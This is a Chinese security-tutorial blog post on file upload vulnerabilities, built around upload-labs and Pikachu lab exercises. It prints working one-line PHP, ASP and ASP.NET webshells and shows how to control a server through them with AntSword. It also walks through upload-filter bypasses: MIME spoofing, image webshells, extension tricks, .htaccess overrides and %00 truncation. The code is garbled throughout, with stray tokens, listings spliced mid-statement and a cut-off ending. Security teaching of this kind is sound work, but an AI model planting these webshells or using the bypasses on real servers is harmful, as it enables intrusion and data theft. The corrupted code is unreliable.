太厉害了，终于有人能把文件上传漏洞讲的明明白白了

大家好！
我是小黄，很高兴又跟大家见面啦 ！
拒绝水文，从我做起 ！！！！
未经允许，禁止转载 ，违者必究！！！！
本实验仅适用于学习和测试 ，严禁违法操作 ！ ！ ！
今天更新的是：

• P7 漏洞类型详解_文件上传漏洞
• 往期检索：小白渗透入门系列 - 目录
• 微信公众号回复：【文件上传】，即可获取本文全部涉及到的工具。

---

创建时间：2021年5月9日
软件： MindMaster Pro

---

一、WebShell 与 WebShell 管理工具

1.1 什么叫做WebShell ？

• WebShell,简称网页后门。简单来说它是运行在Web应用之上的远程控制程序。
• webShell其实就是一张网页，由PHP、JSP、ASP、ASP.NET等这类web应用程序语言开发，但webShell并不具备常见网页的功能，例如登录、注册、信息展示等功能，一般会具备文件管理、端口扫描、提权、获取系统信息等功能。
• 常见的WebShell有哪些？
• 大马、小马、各种马…等
• 拥有较完整功能的webshell，我们一般称为大马。
• 功能简易的webshell称为小马。
• 除此之外还存在一句话木马、菜刀马、脱库马等等的名词，是对于webShell功能或者特性的简称。

1.2 WebShell 有什么作用呢 ？

1.2.1 让我们拿举个例子(一句话木马)来讲：

• 在举例之前的呢，我们要做一些前期准备。

前期准备：

1. 安装一下集成环境：这里推荐使用 PHPstudy 2018、（PHPstudy 2018 可以在我的微信公众号获取）
2. 安装好环境之后我们来编写一个一句话木马（如何编写我们之后详细讲解）
3. 写好之后呢，我们进行本地利用。

---

• 首先我来完整的给大家演示一遍

• 掏出我们之前准备好的一句话木马，放在PHPStudy\PHPTutorial\WWW目录下

<?PHP @eval@H_502_261@($_POST@H_502_261@[x@H_502_261@]@H_502_261@)@H_502_261@; ?>

• 本地访问： 127.0.0.1/shell.PHP（我们刚才创建的木马文件名称）
• 打开HackBar（浏览器插件）：尝试利用这个一句话木马来返回PHPinfo的信息
• 构建返回PHPinfo的语句：X=PHPinfo();这也是一个任意代码执行，我们通过变量X传递的任何指令都会被当做PHP代码来执行。也可以通过这条指令来调用调用系统函数：X=system(whomai); 、x=system(whomai);

---

1.2.2 大马有什么作用呢?

• 当我们通过某些操作上传了大马之后，我们可以通过大马来获取目标主机的控制权限、对内网进行扫描、获取内部系统的信息、盗取数据库等等一系列操作。
• 我们可以在GitHub上来搜索一些webshell（网上的信息可能存在后门要注意分辨，这里我就不放了）

1.3 WebShell 之 PHP 一句话木马解读

<?PHP @eval@H_502_261@($_POST@H_502_261@[x@H_502_261@]@H_502_261@)@H_502_261@; ?>

• $_POST[x]: 获取 POST请求参数中X的值。例如POST请求中传递 x=PHPinfo();，那么 $_POST[x]就等同于PHPinfo();
• eval（）将字符串当做PHP代码去执行。例如 eval('PHPinfo();')，其中 PHPinfo();会被当做PHP代码去执行。

<?PHP @eval@H_502_261@($_POST@H_502_261@[x@H_502_261@]@H_502_261@)@H_502_261@; ?>   实际上的传递过程是这样的
			↓
			↓			
			↓
<?PHP @eval@H_502_261@('PHPinfo();'@H_502_261@)@H_502_261@; ?> 实际的语句是这样的 			

• 我们通过该webshell，传递任意PHP代码，让其去执行，从而达到任意代码执行。
• 错误控制运算符，当将 @放置在一个PHP表达式之前，该表达式可能产生的任何错误信息都被 忽略掉。

1.4 WebShell 之常用的一句话木马

• ASP：

<%eval request@H_502_261@("x"@H_502_261@)%>

• ASP.NET：

<%@ Page Language="Jscript"%><%eval @H_502_261@(Request@H_502_261@.Item@H_502_261@["x"@H_502_261@]@H_502_261@,"unsafe"@H_502_261@)@H_502_261@;%>

• 这些一句话木马的本质是一样的，不同环境要用不同的一句话木马。

1.5 WebShell 管理工具

1.5.1 常用 WebShell 管理工具

• 中国菜地
• 中国蚁剑
• 冰蝎
• 哥斯拉
• …

1.5.2 我们来拿中国蚁剑来举例：

• 打开中国蚁剑，右键打开添加数据

• URL地址：就是一句话木马的地址
• 链接密码：就是变量X
• 编码设置：UTF8
• 链接类型：PHP（你用什么一句话木马链接什么类型）

• 测试一下：链接成功
• 如果链接失败的话，你是不能进行正常访问的。

• 选择添加就可以看到你链接的数据了
• 能够进入到你木马存放的目录了。

• 我们可以尝试着进行增删改查，来实现一些我们想要实现的操作。
• 比如说我们创建一个新的目录，猪猪

@H_502_582@

• 可以查看到刚才新建的

• 比如说我们再创建一个新的目录，1234

• 让我们看看实际演示的过程

• 我们也可以尝试使用一下虚拟终端

• 打开虚拟终端，输入ipconfig 可以查看一下当前的网络信息

• 还可以链接数据库
• 前提： 你需要知道数据库的账号和密码

• 还有一个拓展功能，插件市场。
• 插件市场里面可以选择安装一些常见的插件。比如说存活扫描之类的等等。

1.6 拓展思考

• 我们上面讲了这么多，这个时候有些同学可能就会有疑问了。

1.6.1 思考一：

• 如果去掉一句话木马中的错误运算符 @会产生怎样的效果呢？
• 那我们现在就来尝试一下：

• 可以看到会出现报错信息。

1.6.2 思考二：

• 大马跟小马有什么区别呢？
• 小马的代码量小，但是运行的时候需要环境。功能单一且操作复杂。
• 大马的功能强大，但是限制多（比如说会有很多限制函数），代码量大。也不是很好用。

二、文件上传漏洞概述

2.1 随处可见的文件上传功能

• 大部分站点都具有 文件上传功能，例如头像更改，文章编辑，附件上传等等。

2.2 文件上传功能背后的业务逻辑是什么？

• 文件上传的这个功能是如何实现的呢？
• 文件上传功能的作用是将 本地文件上传至服务器上进行保存。
• 当我们找到上传的入口，上传文件之后。
• 可能会回显文件上传的路径，如果回显了文件上传路径，那么我们就可以根据回显的文件上传路径进行访问，那么我们就可以在浏览器中访问到服务器上的这个文件。
• 可以尝试用pickchu靶场进行复现。
• PikaChu_不安全的文件上传漏洞
• 这里的复现过程，我就不一一赘述了。感兴趣的大家可以访问上面的链接。

2.3 任意文件上传的安全风险

• 假设文件上传功能没有对上传的文件进行限制，可能会引发哪些安全风险?

• 如果是对方是LAMP架构，是否能上传PHP的WebShell到服务端上，然后通过访问上传后的文件地址，从而执行WebShell中的代码。达到控制对方服务器的目的。

• 实验演示：

• 让我们禁用JS来跳过验证来上传一句话木马

• 上传成功之后，尝试访问木马，访问成功之后来验证一下，尝试返回PHPinfo的信息。返回信息成功之后，让我们挂上蚁剑。

• 来我们尝试来链接上蚁剑，链接上之后就能就能干我们想要的操作了。

2.4 什么是文件上传漏洞

• 文件上传漏洞是指文件上传功能没有对上传的文件做合理严谨的过滤，导致用户可以利用此功能，上传能被服务端解析执行的文件，并通过此文件获得执行服务端命令的能力。

三、文件上传漏洞绕过

• 环境准备：upload-labs 靶场的安装与配置教程

3.1 文件上传的验证机制有哪些

• 客户端JavaScript验证

• 服务端MIME类型验证
• 服务端文件扩展名验证（ 黑名单、 白名单 ）
• 服务器文件内容验证 （ 文件头(文件幻数) 、文件加载检测 ）

3.1.1 客户端JavaScript验证

• 目的： 对上传文件的文件格式进行一个验证
• 客户端JavaScript验证验证的机制

---

• 打开upload-labs 靶场第一题 - JS检查
• 源码分析

<?PHP
include '../config.PHP'@H_502_261@;
include '../head.PHP'@H_502_261@;
include '../menu.PHP'@H_502_261@;

$is_upload = false@H_502_261@;
$msg = null@H_502_261@;
if @H_502_261@(isset@H_502_261@($_POST@H_502_261@['submit'@H_502_261@]@H_502_261@)@H_502_261@) @H_502_261@{
    if @H_502_261@(file_exists@H_502_261@(UPLOAD_PATH@H_502_261@)@H_502_261@) @H_502_261@{
        $temp_file = $_FILES@H_502_261@['upload_file'@H_502_261@]@H_502_261@['tmp_name'@H_502_261@]@H_502_261@;
        //取出文件上传后临时存储的文件名
        $img_path = UPLOAD_PATH @H_502_261@. '/' @H_502_261@. $_FILES@H_502_261@['upload_file'@H_502_261@]@H_502_261@['name'@H_502_261@]@H_502_261@;
        //生成一个新的文件存储路径，文件名保持文件上传前的文件名
        if @H_502_261@(move_uploaded_file@H_502_261@($temp_file@H_502_261@, $img_path@H_502_261@)@H_502_261@)@H_502_261@{
        //move_uploaded_file函数把上传的文件移动到新的位置，成功则返回true，失败则返回false
            $is_upload = true@H_502_261@;
        @H_502_261@} else @H_502_261@{
            $msg = '上传出错！'@H_502_261@;
        @H_502_261@}
    @H_502_261@} else @H_502_261@{
        $msg = UPLOAD_PATH @H_502_261@. '文件夹不存在,请手工创建！'@H_502_261@;
    @H_502_261@}
@H_502_261@}
?>

• 这里先是包含几个文件，然后出现了一些新的函数
• file_exists函数检查文件或目录是否存在。如果指定的文件或目录存在则返回 TRUE，否则返回 FALSE。
• 而UPLOAD_PATH这个常量在config.PHP文件中，有这么一段代码define("UPLOAD_PATH","../upload");，进行了设置。
• 那这个$_FILES['upload_file']['tmp_name']又是哪儿冒出来的呢，upload_file就是文件上传的表单的名字,如下图

• 这里是$_FILES中的那些参数：

$_FILES这个变量用与上传的文件参数设置，是一个多维数组
数组的用法就是 $_FILES@H_502_261@['key'@H_502_261@]@H_502_261@['key2'@H_502_261@]@H_502_261@;
$_FILES@H_502_261@['upfile'@H_502_261@]是你表单上传的文件信息数组，upfile是文件上传字段，在上传时由服务器根据上传字段设定。

$_FILES@H_502_261@['upfile'@H_502_261@]包含了以下内容@H_502_261@:
$_FILES@H_502_261@['upfile'@H_502_261@]@H_502_261@['name'@H_502_261@] 客户端文件的原名称。
$_FILES@H_502_261@['upfile'@H_502_261@]@H_502_261@['type'@H_502_261@] 文件的 MIME 类型，需要浏览器提供该信息的支持，例如"image/gif"。
$_FILES@H_502_261@['upfile'@H_502_261@]@H_502_261@['size'@H_502_261@] 已上传文件的大小，单位为字节。
$_FILES@H_502_261@['upfile'@H_502_261@]@H_502_261@['tmp_name'@H_502_261@] 文件被上传后在服务端储存的临时文件名。
$_FILES@H_502_261@['upfile'@H_502_261@]@H_502_261@['error'@H_502_261@] 和该文件上传相关的错误代码。

• 下面这段js代码定义了检查上传文件的函数

<script type="text/javascript">
    function checkFile@H_502_261@(@H_502_261@) @H_502_261@{
        var file = document@H_502_261@.getElementsByName@H_502_261@('upload_file'@H_502_261@)@H_502_261@[0@H_502_261@]@H_502_261@.value@H_502_261@;
        //获取到文件名
        if @H_502_261@(file == null || file == ""@H_502_261@) @H_502_261@{
            alert@H_502_261@("请选择要上传的文件!"@H_502_261@)@H_502_261@;
            return false@H_502_261@;
        @H_502_261@}
       
        var allow_ext = ".jpg|.png|.gif"@H_502_261@;
         //定义允许上传的文件类型
        
        var ext_name = file@H_502_261@.substring@H_502_261@(file@H_502_261@.lastIndexOf@H_502_261@("."@H_502_261@)@H_502_261@)@H_502_261@;
        //提取上传文件的类型。
        //通过lastIndexOf取到“.”的索引，再使用substring函数截取 .后缀名
       
        if @H_502_261@(allow_ext@H_502_261@.indexOf@H_502_261@(ext_name@H_502_261@) == -1@H_502_261@) @H_502_261@{
        //如果 allow_ext 中没有 ext_name字符串，则返回-1
            var errMsg = "该文件不允许上传，请上传" + allow_ext + "类型的文件,当前文件类型为：" + ext_name@H_502_261@;
            alert@H_502_261@(errMsg@H_502_261@)@H_502_261@;
            return false@H_502_261@;
        @H_502_261@}
         //判断上传文件类型是否允许上传
    @H_502_261@}
</script>

---

• 推荐两个关于JS的浏览器插件
• 关于禁用JS的两个浏览器插件，个人倾向性于第一个，我觉得可以选择禁用JS简单快捷高效，第二个的话功能比较多一些，但是也会禁用掉正常页面的JS

---

3.1.1.1 绕过客户端JavaScript验证的方法

• 方法一： 修改JavaScript去修改其中关键的检测函数，或者直接通过插件禁用JavaScript。

• 方法二： 直接发送请求包,通过Burp抓到正常上传的请求报文后，修改报文的内容，在直接通过Burp发送，便跳过了网页中JS的验证过程。

• 修改一句话木马文件，将文件格式改成允许上传的文件格式。
• 进行上传文件，使用BP拦截数据包。

• 将抓取到的数据包中的文件格式修改回PHP、再进行发送，从而实现文件上传

• 后续的验证操作，跟上面木马利用一样。
• 主要就是介绍了一下前端的验证，以及文件上传可以干个啥事。这一关希望大家记住一句话 “所有前端的验证机制都是不安全的”，因为前端的东西是用户可控制的。

3.2 服务端MIME类型验证

• MIME类型是描述消息内容类型的因特网标准。

• 利用Burp抓包，将报文中的Content-Type改成允许的类型
• Content-Type: image/gif
• Content-Type: image/jpg
• Content-Type: image/png

---

• 打开upload-labs 靶场第二题 - JS检查
• 源码分析

$is_upload = false@H_502_261@;
$msg = null@H_502_261@;
if @H_502_261@(isset@H_502_261@($_POST@H_502_261@['submit'@H_502_261@]@H_502_261@)@H_502_261@) @H_502_261@{
    if @H_502_261@(file_exists@H_502_261@(UPLOAD_PATH@H_502_261@)@H_502_261@) @H_502_261@{
        if @H_502_261@(@H_502_261@($_FILES@H_502_261@['upload_file'@H_502_261@]@H_502_261@['type'@H_502_261@] == 'image/jpeg'@H_502_261@) || @H_502_261@($_FILES@H_502_261@['upload_file'@H_502_261@]@H_502_261@['type'@H_502_261@] == 'image/png'@H_502_261@) || @H_502_261@($_FILES@H_502_261@['upload_file'@H_502_261@]@H_502_261@['type'@H_502_261@] == 'image/gif'@H_502_261@)@H_502_261@) @H_502_261@{
            $temp_file = $_FILES@H_502_261@['upload_file'@H_502_261@]@H_502_261@['tmp_name'@H_502_261@]@H_502_261@;
            $img_path = UPLOAD_PATH @H_502_261@. '/' @H_502_261@. $_FILES@H_502_261@['upload_file'@H_502_261@]@H_502_261@['name'@H_502_261@]@H_502_261@;          
            if @H_502_261@(move_uploaded_file@H_502_261@($temp_file@H_502_261@, $img_path@H_502_261@)@H_502_261@) @H_502_261@{
                $is_upload = true@H_502_261@;
            @H_502_261@} else @H_502_261@{
                $msg = '上传出错！'@H_502_261@;
            @H_502_261@}
        @H_502_261@} else @H_502_261@{
            $msg = '文件类型不正确，请重新上传！'@H_502_261@;
        @H_502_261@}
    @H_502_261@} else @H_502_261@{
        $msg = UPLOAD_PATH@H_502_261@.'文件夹不存在,请手工创建！'@H_502_261@;
    @H_502_261@}
@H_502_261@}

• 可以看到，其实并没有什么特别之处，就是使用了$_FILES['upload_file']['type']获取到Content-Type字段，并进行比较，如果是那三种类型就继续向下执行，否则进行提示。

---

• 可以尝试用pickchu靶场进行复现。
• PikaChu_不安全的文件上传漏洞
• 这里的复现过程，我就不一一赘述了。感兴趣的大家可以访问上面的链接。
  

  

3.3 服务器文件内容验证-文件头

• 图片格式往往不是根据文件后缀名去做判断的。文件头是文件开头的一段二进制，不同的图片类型，文件头是不同的。文件头又称文件幻数。
• 常见文件幻数
• JPG: FF D8 FF EO 00 10 4A 46 49 46.
• GIF:47 49 46 3839 61(GIF89a).
• PNG:89 50 4E 47

3.3.1 绕过服务器文件内容验证-文件头

---

• 打开upload-labs 靶场第十三题 - 图片马绕过
• 源码分析

function getReailFileType@H_502_261@($filename@H_502_261@)@H_502_261@{
    $file = fopen@H_502_261@($filename@H_502_261@, "rb"@H_502_261@)@H_502_261@;
    $bin = fread@H_502_261@($file@H_502_261@, 2@H_502_261@)@H_502_261@; //只读2字节
    fclose@H_502_261@($file@H_502_261@)@H_502_261@;
    $strInfo = @unpack@H_502_261@("C2chars"@H_502_261@, $bin@H_502_261@)@H_502_261@;    
    $typeCode = intval@H_502_261@($strInfo@H_502_261@['chars1'@H_502_261@]@H_502_261@.$strInfo@H_502_261@['chars2'@H_502_261@]@H_502_261@)@H_502_261@;    
    $fileType = ''@H_502_261@;    
    switch@H_502_261@($typeCode@H_502_261@)@H_502_261@{      
        case 255216@H_502_261@:            
            $fileType = 'jpg'@H_502_261@;
            break@H_502_261@;
        case 13780@H_502_261@:            
            $fileType = 'png'@H_502_261@;
            break@H_502_261@;        
        case 7173@H_502_261@:            
            $fileType = 'gif'@H_502_261@;
            break@H_502_261@;
        default@H_502_261@:            
            $fileType = 'unkNown'@H_502_261@;
        @H_502_261@}    
        return $fileType@H_502_261@;
@H_502_261@}

$is_upload = false@H_502_261@;
$msg = null@H_502_261@;
if@H_502_261@(isset@H_502_261@($_POST@H_502_261@['submit'@H_502_261@]@H_502_261@)@H_502_261@)@H_502_261@{
    $temp_file = $_FILES@H_502_261@['upload_file'@H_502_261@]@H_502_261@['tmp_name'@H_502_261@]@H_502_261@;
    $file_type = getReailFileType@H_502_261@($temp_file@H_502_261@)@H_502_261@;

    if@H_502_261@($file_type == 'unkNown'@H_502_261@)@H_502_261@{
        $msg = "文件未知，上传失败！"@H_502_261@;
    @H_502_261@}else@H_502_261@{
        $img_path = UPLOAD_PATH@H_502_261@."/"@H_502_261@.rand@H_502_261@(10@H_502_261@, 99@H_502_261@)@H_502_261@.date@H_502_261@("YmdHis"@H_502_261@)@H_502_261@."."@H_502_261@.$file_type@H_502_261@;
        if@H_502_261@(move_uploaded_file@H_502_261@($temp_file@H_502_261@,$img_path@H_502_261@)@H_502_261@)@H_502_261@{
            $is_upload = true@H_502_261@;
        @H_502_261@} else @H_502_261@{
            $msg = "上传出错！"@H_502_261@;
        @H_502_261@}
    @H_502_261@}
@H_502_261@}

• 方法一： 伪造文件头绕过方法

• 方法二： 利用服务器将木马文件解析成了图片文件，因此向其发送执行该文件的请求时，服务器只会返回这个“图片”文件，并不会执行相应命令。

• 利用 文件包含漏洞 可以将图片格式的文件当做PHP文件来解析执行:http://127.0.0.1/pikachu/vul/fileinclude/fi_local.PHP?filename=../../unsafeupload/uploads/2021/03/20/9439796055e7a8d1a39396276569.jpg&submit=提交查询

• 模板：http://127.0.0.1/pikachu/vul/fileinclude/fi_local.PHP?filename=../../unsafeupload/上传文件的回显路径&submit=提交查询

3.3.2 如何生成图片木马：

1. 在路径下准备好一句话木马.PHP和一张图片 .png (或者 .jpg )
2. 输入系统指令： copy 一张图片.png/b+一句话木马.PHP/a 生成图片名称.png
3. 这样图片木马就合成好了

3.4 服务器文件扩展名验证-黑名单

• 服务器文件扩展名验证-黑名单的原理

• 环境准备：upload-labs 靶场的安装与配置教程

3.4.1 后缀名大小写绕过

• 后缀名大小写绕过原理：服务端没有将后缀名转换为统一格式进行比对，导致可以上传后缀为PHP的文件，又因为Windows操作系统大小写不敏感，所以.PHP扔回被当成PHP文件解析。

$is_upload = false@H_502_261@;
$msg = null@H_502_261@;
if @H_502_261@(isset@H_502_261@($_POST@H_502_261@['submit'@H_502_261@]@H_502_261@)@H_502_261@) @H_502_261@{
    if @H_502_261@(file_exists@H_502_261@(UPLOAD_PATH@H_502_261@)@H_502_261@) @H_502_261@{
        $deny_ext = array@H_502_261@(".PHP"@H_502_261@,".PHP5"@H_502_261@,".PHP4"@H_502_261@,".PHP3"@H_502_261@,".PHP2"@H_502_261@,".html"@H_502_261@,".htm"@H_502_261@,".phtml"@H_502_261@,".pht"@H_502_261@,".PHP"@H_502_261@,".PHP5"@H_502_261@,".PHP4"@H_502_261@,".PHP3"@H_502_261@,".PHP2"@H_502_261@,".Html"@H_502_261@,".Htm"@H_502_261@,".pHtml"@H_502_261@,".jsp"@H_502_261@,".jspa"@H_502_261@,".jspx"@H_502_261@,".jsw"@H_502_261@,".jsv"@H_502_261@,".jspf"@H_502_261@,".jtml"@H_502_261@,".jSp"@H_502_261@,".jSpx"@H_502_261@,".jSpa"@H_502_261@,".jSw"@H_502_261@,".jSv"@H_502_261@,".jSpf"@H_502_261@,".jHtml"@H_502_261@,".asp"@H_502_261@,".aspx"@H_502_261@,".asa"@H_502_261@,".asax"@H_502_261@,".ascx"@H_502_261@,".ashx"@H_502_261@,".asmx"@H_502_261@,".cer"@H_502_261@,".aSp"@H_502_261@,".aSpx"@H_502_261@,".aSa"@H_502_261@,".aSax"@H_502_261@,".aScx"@H_502_261@,".aShx"@H_502_261@,".aSmx"@H_502_261@,".cEr"@H_502_261@,".sWf"@H_502_261@,".swf"@H_502_261@,".htaccess"@H_502_261@)@H_502_261@;
        $file_name = trim@H_502_261@($_FILES@H_502_261@['upload_file'@H_502_261@]@H_502_261@['name'@H_502_261@]@H_502_261@)@H_502_261@;
        $file_name = deldot@H_502_261@($file_name@H_502_261@)@H_502_261@;//删除文件名末尾的点
        $file_ext = strrchr@H_502_261@($file_name@H_502_261@, '.'@H_502_261@)@H_502_261@;
        $file_ext = str_ireplace@H_502_261@('::$DATA'@H_502_261@, ''@H_502_261@, $file_ext@H_502_261@)@H_502_261@;//去除字符串::$DATA
        $file_ext = trim@H_502_261@($file_ext@H_502_261@)@H_502_261@; //首尾去空

        if @H_502_261@(!in_array@H_502_261@($file_ext@H_502_261@, $deny_ext@H_502_261@)@H_502_261@) @H_502_261@{
            $temp_file = $_FILES@H_502_261@['upload_file'@H_502_261@]@H_502_261@['tmp_name'@H_502_261@]@H_502_261@;
            $img_path = UPLOAD_PATH@H_502_261@.'/'@H_502_261@.date@H_502_261@("YmdHis"@H_502_261@)@H_502_261@.rand@H_502_261@(1000@H_502_261@,9999@H_502_261@)@H_502_261@.$file_ext@H_502_261@;
            if @H_502_261@(move_uploaded_file@H_502_261@($temp_file@H_502_261@, $img_path@H_502_261@)@H_502_261@) @H_502_261@{
                $is_upload = true@H_502_261@;
            @H_502_261@} else @H_502_261@{
                $msg = '上传出错！'@H_502_261@;
            @H_502_261@}
        @H_502_261@} else @H_502_261@{
            $msg = '此文件类型不允许上传！'@H_502_261@;
        @H_502_261@}
    @H_502_261@} else @H_502_261@{
        $msg = UPLOAD_PATH @H_502_261@. '文件夹不存在,请手工创建！'@H_502_261@;
    @H_502_261@}
@H_502_261@}

• 通过源代码我们可以发现，黑名单里虽然过滤的很全面，但是在下面的后缀名处理之中却出现了纰漏，没有将后缀名转换为小写。

$file_ext = strtolower@H_502_261@($file_ext@H_502_261@)@H_502_261@; //转换为小写

• 这样的话，我们就可以进行大小写绕过了。首先来说，直接上传后缀名为.PHP的文件成功。

---

3.4.2 修改后缀名绕过?

• 源码分析

$is_upload = false@H_502_261@;
$msg = null@H_502_261@;
if @H_502_261@(isset@H_502_261@($_POST@H_502_261@['submit'@H_502_261@]@H_502_261@)@H_502_261@) @H_502_261@{
    if @H_502_261@(file_exists@H_502_261@(UPLOAD_PATH@H_502_261@)@H_502_261@) @H_502_261@{
        $deny_ext = array@H_502_261@('.asp'@H_502_261@,'.aspx'@H_502_261@,'.PHP'@H_502_261@,'.jsp'@H_502_261@)@H_502_261@;
        $file_name = trim@H_502_261@($_FILES@H_502_261@['upload_file'@H_502_261@]@H_502_261@['name'@H_502_261@]@H_502_261@)@H_502_261@;
        $file_name = deldot@H_502_261@($file_name@H_502_261@)@H_502_261@;//删除文件名末尾的点
        $file_ext = strrchr@H_502_261@($file_name@H_502_261@, '.'@H_502_261@)@H_502_261@;
        $file_ext = strtolower@H_502_261@($file_ext@H_502_261@)@H_502_261@; //转换为小写
        $file_ext = str_ireplace@H_502_261@('::$DATA'@H_502_261@, $file_ext@H_502_261@)@H_502_261@;//去除字符串::$DATA
        $file_ext = trim@H_502_261@($file_ext@H_502_261@)@H_502_261@; //收尾去空

        if@H_502_261@(!in_array@H_502_261@($file_ext@H_502_261@,9999@H_502_261@)@H_502_261@.$file_ext@H_502_261@;            
            if @H_502_261@(move_uploaded_file@H_502_261@($temp_file@H_502_261@,$img_path@H_502_261@)@H_502_261@) @H_502_261@{
                 $is_upload = true@H_502_261@;
            @H_502_261@} else @H_502_261@{
                $msg = '上传出错！'@H_502_261@;
            @H_502_261@}
        @H_502_261@} else @H_502_261@{
            $msg = '不允许上传.asp,.aspx,.PHP,.jsp后缀文件！'@H_502_261@;
        @H_502_261@}
    @H_502_261@} else @H_502_261@{
        $msg = UPLOAD_PATH @H_502_261@. '文件夹不存在,请手工创建！'@H_502_261@;
    @H_502_261@}
@H_502_261@}

• 用黑名单不允许上传.asp,.jsp后缀的文件
• 但可以上传.phtml .PHPs .PHP5 .pht
• 前提是apache的httpd.conf中有如下配置代码

AddType application/x-httpd-PHP @H_502_261@.PHP @H_502_261@.phtml @H_502_261@.PHPs @H_502_261@.PHP5 @H_502_261@.pht

• 当我们修改文件后缀名之后，可以发现到文件正常上传成功。

• 我们从RAW包中可以查找到文件上传的位置。

• 我们可以在浏览器中进行构建URL（就是构建一下访问地址）进行访问。
• 构建的URL：http://127.0.0.1/upload/upload/202105181219104196.PHP5
• URL模板： http://127.0.0.1/upload/文件上传路径
• 该URL模板只适用该案例

---

3.4.3 重写绕过

• 服务端将黑名单的后缀名替换为空，但仅进行一次。上传.PHPhpp后缀，替换PHP一次为空，则后缀

$is_upload = false@H_502_261@;
$msg = null@H_502_261@;
if @H_502_261@(isset@H_502_261@($_POST@H_502_261@['submit'@H_502_261@]@H_502_261@)@H_502_261@) @H_502_261@{
    if @H_502_261@(file_exists@H_502_261@(UPLOAD_PATH@H_502_261@)@H_502_261@) @H_502_261@{
        $deny_ext = array@H_502_261@("PHP"@H_502_261@,"PHP5"@H_502_261@,"PHP4"@H_502_261@,"PHP3"@H_502_261@,"PHP2"@H_502_261@,"html"@H_502_261@,"htm"@H_502_261@,"phtml"@H_502_261@,"pht"@H_502_261@,"jsp"@H_502_261@,"jspa"@H_502_261@,"jspx"@H_502_261@,"jsw"@H_502_261@,"jsv"@H_502_261@,"jspf"@H_502_261@,"jtml"@H_502_261@,"asp"@H_502_261@,"aspx"@H_502_261@,"asa"@H_502_261@,"asax"@H_502_261@,"ascx"@H_502_261@,"ashx"@H_502_261@,"asmx"@H_502_261@,"cer"@H_502_261@,"swf"@H_502_261@,"htaccess"@H_502_261@)@H_502_261@;

        $file_name = trim@H_502_261@($_FILES@H_502_261@['upload_file'@H_502_261@]@H_502_261@['name'@H_502_261@]@H_502_261@)@H_502_261@;
        $file_name = str_ireplace@H_502_261@($deny_ext@H_502_261@,""@H_502_261@, $file_name@H_502_261@)@H_502_261@;
        $temp_file = $_FILES@H_502_261@['upload_file'@H_502_261@]@H_502_261@['tmp_name'@H_502_261@]@H_502_261@;
        $img_path = UPLOAD_PATH@H_502_261@.'/'@H_502_261@.$file_name@H_502_261@;        
        if @H_502_261@(move_uploaded_file@H_502_261@($temp_file@H_502_261@, $img_path@H_502_261@)@H_502_261@) @H_502_261@{
            $is_upload = true@H_502_261@;
        @H_502_261@} else @H_502_261@{
            $msg = '上传出错！'@H_502_261@;
        @H_502_261@}
    @H_502_261@} else @H_502_261@{
        $msg = UPLOAD_PATH @H_502_261@. '文件夹不存在,请手工创建！'@H_502_261@;
    @H_502_261@}
@H_502_261@}

3.4.4 特殊可解析后缀绕过

• 黑名单规则不严谨，在某些特定环境中某些特殊后缀名仍会被当做PHP文件解析。PHPlPHP2/PHP3/PHP4lPHP5/PHP6lPHP7/phtlphtm/phtml
• 基于debian和ubuntu的apt-get安装apache，默认对于文件的解析规则如下。

3.4.5 .htaccess绕过

• 在apache里，这个文件作为一个配置文件，可以用来控制所在目录的访问权限以及解析设置。即是，可以通过设置可以将该目录下的所有文件作为PHP文件来解析
• .htaccess可以写入apache配置信息，改变当前目录以及子目录的Apache配置信息。
• 前提条件： 配置上允许.htaccess生效
  Apache开启rewrite模块
  .apache配置文件为AllowOverride All(默认为None)

• 方法一： 所有jpg后祭都会背当做PHP解析

 - AddType application/x-httpd-PHP@H_502_261@.jpg

• 方法二： 带有jpg关键字会被当岗PHP解析

<FilesMatch "sec.jpg">
SetHandler application/x-httpd-PHP
</FilesMatch>

3.4.6 利用操作系统特性-windos

• 利用window对于文件和文件名的限制，以下字符放在结尾时，不符合操作系统的命名规范,在最后生成文件时，字符会被自动去除。

• 源码分析：
• 第一种： 对应upland第6题

$is_upload = false@H_502_261@;
$msg = null@H_502_261@;
if @H_502_261@(isset@H_502_261@($_POST@H_502_261@['submit'@H_502_261@]@H_502_261@)@H_502_261@) @H_502_261@{
    if @H_502_261@(file_exists@H_502_261@(UPLOAD_PATH@H_502_261@)@H_502_261@) @H_502_261@{
        $deny_ext = array@H_502_261@(".PHP"@H_502_261@,".htaccess"@H_502_261@)@H_502_261@;
        $file_name = $_FILES@H_502_261@['upload_file'@H_502_261@]@H_502_261@['name'@H_502_261@]@H_502_261@;
        $file_name = deldot@H_502_261@($file_name@H_502_261@)@H_502_261@;//删除文件名末尾的点
        $file_ext = strrchr@H_502_261@($file_name@H_502_261@, $file_ext@H_502_261@)@H_502_261@;//去除字符串::$DATA
        
        if @H_502_261@(!in_array@H_502_261@($file_ext@H_502_261@,$img_path@H_502_261@)@H_502_261@) @H_502_261@{
                $is_upload = true@H_502_261@;
            @H_502_261@} else @H_502_261@{
                $msg = '上传出错！'@H_502_261@;
            @H_502_261@}
        @H_502_261@} else @H_502_261@{
            $msg = '此文件不允许上传'@H_502_261@;
        @H_502_261@}
    @H_502_261@} else @H_502_261@{
        $msg = UPLOAD_PATH @H_502_261@. '文件夹不存在,请手工创建！'@H_502_261@;
    @H_502_261@}
@H_502_261@}

• 这题没有对后缀名进行去空，因此可以在后缀名加空格绕过

@H_3_4047@

3.4.7 %00截断

• %00是chr(O)，它不是空格，是NULL，空字符。
• 当程序在输出含有chr(O)变量时，chr(O)后面的数据会被停止，换句话说，就是误把它当做结束符，后面的数据直接忽略，这就导致漏洞产生的原因。
• 在文件上传中，利用%00截断，在文件扩展名验证时，是取文件的扩展名来做验证，但是最后文件保存在本地时，%00会截断文件名，只保存%00之前的内容。
• 前提条件： PHP版本 < 5.34 、PHP的magic_quotes_gpc为OFF状态
• 源码分析：
• 第一种： 对应upland第11题

$is_upload = false@H_502_261@;
$msg = null@H_502_261@;
if@H_502_261@(isset@H_502_261@($_POST@H_502_261@['submit'@H_502_261@]@H_502_261@)@H_502_261@)@H_502_261@{
    $ext_arr = array@H_502_261@('jpg'@H_502_261@,'png'@H_502_261@,'gif'@H_502_261@)@H_502_261@;
    $file_ext = substr@H_502_261@($_FILES@H_502_261@['upload_file'@H_502_261@]@H_502_261@['name'@H_502_261@]@H_502_261@,strrpos@H_502_261@($_FILES@H_502_261@['upload_file'@H_502_261@]@H_502_261@['name'@H_502_261@]@H_502_261@,"."@H_502_261@)+1@H_502_261@)@H_502_261@;
    if@H_502_261@(in_array@H_502_261@($file_ext@H_502_261@,$ext_arr@H_502_261@)@H_502_261@)@H_502_261@{
